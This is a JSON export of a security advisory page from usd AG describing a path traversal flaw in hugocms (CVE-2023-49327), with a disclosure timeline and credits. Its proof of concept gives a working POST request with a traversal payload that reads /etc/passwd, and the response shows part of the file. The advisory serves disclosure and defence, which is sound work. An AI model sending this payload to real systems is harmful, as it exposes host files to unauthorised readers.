{"id":22882,"date":"2024-07-22T11:02:11","date_gmt":"2024-07-22T09:02:11","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=22882"},"modified":"2024-07-24T11:22:33","modified_gmt":"2024-07-24T09:22:33","slug":"usd-2023-0034","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0034\/","title":{"rendered":"usd-2023-0034"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.26.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0034 | Arbitrary File Reads in hugocms<\/h1>\n<h1><\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0034<br \/><strong>Product<\/strong>: hugocms<br \/><strong>Affected Version<\/strong>: (latest as of 25.09.2023; commit 77443d6)<br \/><strong>Vulnerability Type<\/strong>: CWE-35: Path Traversal<br \/><strong>Security Risk<\/strong>: HIGH<br \/><strong>Vendor URL<\/strong>: <a>https:\/\/hugoeditor.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>Advisory Status<\/strong>: Published<br \/><strong>CVE number<\/strong>: CVE-2023-49327<br \/><strong>First Published<\/strong>: 2024-07-18<br \/><strong>Last Update<\/strong>: 2024-07-18<\/p>\n<h3>Desciption<\/h3>\n<p>The application <em>hugocms<\/em>, developed by Inter-Data, provides a frontend for the static site generator <em>hugo<\/em> to manage posts and other aspects of the site. The application does not provide any access-control mechanism and recommends to restrict access via a web server's basic auth capabilities.<\/p>\n<p>Users with access to hugocms can read arbitrary files of the host system by performing a path traversal. The flaw is present in <strong>hugocms\/editor.load.php<\/strong>.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The following request reads the <strong>passwd<\/strong> file of the host:<\/p>\n<p>Request:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/public\/edit\/hugocms\/editor.load.php<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">10.1.1.157<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/x-www-form-urlencoded; charset=UTF-8<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">28<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">file<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\/..\/..\/..\/..\/etc\/passwd<\/span><\/pre>\n<\/div>\n<p>Response:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 25 Sep 2023 18:40:34 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache\/2.4.57 (Debian)<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Vary<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Accept-Encoding<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1136<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">text\/html; charset=UTF-8<\/span>root:x:0:0:root:\/root:\/bin\/bashdaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologinbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologinsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin[...]www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin[...]sshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin[...]<\/pre>\n<\/div>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2023-09-25<\/strong>: Vulnerability identified by Florian Dewald.<\/li>\n<li><strong>2023-10-02<\/strong>: Sent first contact request.<\/li>\n<li><strong>2023-10-16<\/strong>: Sent reminder email mentioning disclosure deadline.<\/li>\n<li><strong>2023-10-25<\/strong>: Sent another reminder stressing that vulnerabilities will be publicly disclosed.<\/li>\n<li><strong>2023-11-13<\/strong>: Sent another reminder stressing our deadline and that vulnerabilities will be publicly disclosed if we receive no answer.<\/li>\n<li><strong>2023-11-22<\/strong>: Reached vendor via phone, sent vulnerability information.<\/li>\n<li><strong>2023-12-04<\/strong>: Sent status update request to info@inter-data.de<\/li>\n<li><strong>2023-12-06<\/strong>: Inter-Data reports that a fix is being worked on.<\/li>\n<li><strong>2024-01-03<\/strong>: According to Inter-Data a fix is in the works and should be finished soon.<\/li>\n<li><strong>2024-01-24<\/strong>: Reached out to Inter-Data for another status update.<\/li>\n<li><strong>2024-01-26<\/strong>: Inter-Data reports that the vulnerability is fixed.<\/li>\n<li><strong>2024-07-18<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Florian Dewald of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0034 | Arbitrary File Reads in hugocms Advisory ID: usd-2023-0034Product: hugocmsAffected Version: (latest as of 25.09.2023; commit 77443d6)Vulnerability Type: CWE-35: Path TraversalSecurity Risk: HIGHVendor URL: https:\/\/hugoeditor.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedAdvisory Status: PublishedCVE number: CVE-2023-49327First Published: 2024-07-18Last Update: 2024-07-18 Desciption The application hugocms, developed by Inter-Data, provides a frontend for the static site generator hugo [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-22882","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=22882"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22882\/revisions"}],"predecessor-version":[{"id":23077,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/22882\/revisions\/23077"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=22882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}